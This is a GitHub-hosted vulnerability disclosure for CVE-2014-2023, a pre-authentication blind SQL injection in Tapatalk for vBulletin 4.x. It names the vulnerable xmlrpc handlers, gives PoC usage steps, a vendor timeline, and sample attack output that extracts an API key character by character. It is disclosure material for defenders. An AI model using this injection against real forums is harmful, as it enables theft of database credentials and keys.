Skip to content
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
pub/pocs/cve-2014-2023/
pub/pocs/cve-2014-2023/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

Preliminary VulnNote

CVE-2014-2023 - Tapatalk for vbulletin 4.x - multiple blind sql injection (pre-auth)

Overview

date    :  10/12/2014   
cvss    :  7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) base  
cwe     :  89   

vendor  :  Tapatalk Inc  
product :  Tapatalk for vBulletin 4.x   
versions affected:	<= 5.2.1 - latest (to date)
					5.2.1	(verified)
					4.9.0 	(verified)
					
exploitability :
			* remotely exploitable
			* NO authentication required
			* NO user interaction required
			* NO special configuration required (default settings)

Abstract

Tapatalk for vBulletin 4.x does not properly sanitize some xmlrpc calls for
unsubscribe_topic, unsubscribe_forum allowing unauthenticated users to
inject arbitrary SQL commands.

googledork: see PoC code

Details

vulnerable component: 
	./mobiquo/functions/unsubscribe_forum.php
	./mobiquo/functions/unsubscribe_topic.php
xmlrpc request is decoded, decoded attacker provided values are directly
being used in sql query.

Proof of Concept (PoC)

see https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2023


1) prerequisites
     vBulletin 4.x with Tapatalk for vBulletin 4.x installed
2) run PoC
	 edit PoC to match your TARGET (, optionally DEBUG=True)
	 (optionally) edit your query to extract specific database values
	 Note: PoC will try to detect tapatalk on that host
	 run PoC
	
by default extracts
* mysql root hash (in case vBulletin db user has permissions to do so)
* vbulletin db record fields (apikey) - perfectly chains with CVE-2014-2023

only limited by the vBulletin db_user access permissions


run:
[ i] Taptalk detected ...  'http://TARGET/mobiquo/mobiquo.php' ...  v.5.2.1  :) - OK
[   ] TAPATALK for vBulletin 4.x - SQLi
[--] Target: http://TARGET/forum.php
[ +] Attack - sqli
[ *] guess mysql user/pass
[    ] trying to guess length ...
. 
[  *] LENGTH = 0
[    ] trying to guess value  ...
[  *] SUCCESS!: query: select -1 from mysql.user where user='root' and password =''

[ *] guess apikey
[    ] trying to guess length ...
. . . . . . . . . 
[  *] LENGTH = 8
[    ] trying to guess value  ...
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 
[  +] HIT! - [4]..
. . . . . . 
[  +] HIT! - 4[F]..
. 
[  +] HIT! - 4F[A]..
. . . . . . . . . . . . . . . . . . . . . . 
[  +] HIT! - 4FA[V]..
. . . 
[  +] HIT! - 4FAV[c]..
. . . . . . . . . . . . . . . . . . 
[  +] HIT! - 4FAVc[R]..
. . . . 
[  +] HIT! - 4FAVcR[D]..
. . . 
[  +] HIT! - 4FAVcRD[c]..
[  *] SUCCESS!: query: select -1 from setting where varname='apikey' and value ='4FAVcRDc'
4FAVcRDc
-- done --

Timeline

2014-01-14: initial vendor contact, no response
2014-02-24: vendor contact, no response
2014-10-13: public disclosure
2014-10-14: vendor response - acknowledged, fix in progress
2014-10-17: waiting for fix to become publicly available
2014-10-24: poc release

Contact

tintinweb - https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2023

(0x721427D8)